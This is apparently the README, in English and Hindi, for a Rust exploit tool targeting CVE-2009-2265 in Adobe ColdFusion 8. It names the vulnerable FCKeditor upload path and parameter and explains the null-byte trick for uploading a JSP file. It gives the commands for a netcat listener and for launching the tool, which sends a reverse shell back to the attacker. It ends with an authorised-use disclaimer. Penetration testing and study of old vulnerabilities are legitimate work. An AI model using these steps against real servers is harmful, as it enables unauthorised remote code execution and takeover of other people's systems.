
A Rust implementation of the POC for the CVE-2009-2265 exploit, targeting Adobe ColdFusion 8.
CVE-2009-2265 एक्सप्लॉइट के POC का एक रस्ट कार्यान्वयन, जो एडोब कोल्डफ्यूजन 8 को लक्षित करता है।
यह भेद्यता एक अप्रमाणित हमलावर को एडोब कोल्डफ्यूजन 8 चलाने वाले सर्वर पर वेब-सुलभ निर्देशिका में मनमानी फ़ाइलें अपलोड करने की अनुमति देती है, जिससे रिमोट कोड निष्पादन (RCE) होता है।
upload.cfm कनेक्टरCurrentFolderयह भेद्यता /CFIDE/scripts/ajax/FCKeditor/editor/filemanager/connectors/cfm/upload.cfm पर स्थित FCKeditor घटक की फ़ाइल अपलोड कार्यक्षमता में मौजूद है। CurrentFolder HTTP GET पैरामीटर को ठीक से स्वच्छ नहीं किया गया है, जो नल बाइट (%00) इंजेक्शन हमले की अनुमति देता है।
एक अनुरोध बनाकर जहाँ CurrentFolder पैरामीटर को /<filename>.jsp%00 पर सेट किया जाता है, एक हमलावर सर्वर-साइड एक्सटेंशन जाँचों को बायपास कर सकता है। अंतर्निहित प्रणाली (अक्सर जावा) नल बाइट को स्ट्रिंग के अंत के रूप में व्याख्यायित करती है, फ़ाइल नाम को <filename>.jsp मानते हुए। यह हमलावर को एक दुर्भावनापूर्ण JSP फ़ाइल अपलोड करने की अनुमति देता है। सर्वर इस फ़ाइल को सार्वजनिक रूप से सुलभ निर्देशिका (/userfiles/file/) में सहेजता है, जहाँ से इसे केवल इसके URL तक पहुँच कर निष्पादित किया जा सकता है।
यह POC एक JSP रिवर्स शेल पेलोड उत्पन्न करके, नल बाइट भेद्यता का उपयोग करके इसे अपलोड करके, और लक्ष्य प्रणाली पर शेल प्राप्त करने के लिए इसे ट्रिगर करके प्रक्रिया को स्वचालित करता है।
एक्सप्लॉइट को संकलित और चलाने के लिए इन चरणों का पालन करें।
एक्सप्लॉइट चलाने से पहले, आने वाले रिवर्स शेल को पकड़ने के लिए अपनी स्थानीय मशीन पर एक लिसनर शुरू करें।
nc -lnvp <attacker-port>
संकलित बाइनरी को निष्पादित करें, रिवर्स शेल के लिए अपना स्थानीय होस्ट/पोर्ट और रिमोट लक्ष्य का होस्ट/पोर्ट प्रदान करें।
cargo run -- --lhost <LHOST> --lport <LPORT> --rhost <RHOST> --rport <RPORT>
स्क्रिप्ट द्वारा पेलोड ट्रिगर करने के बाद, आपको अपने Netcat लिसनर पर एक कनेक्शन प्राप्त करना चाहिए।
यह उपकरण केवल शैक्षिक और अधिकृत पैठ परीक्षण उद्देश्यों के लिए है। जिम्मेदारी से और केवल उन प्रणालियों पर उपयोग करें जिनके आप स्वामी हैं या जिनके लिए आपके पास स्पष्ट अनुमति है।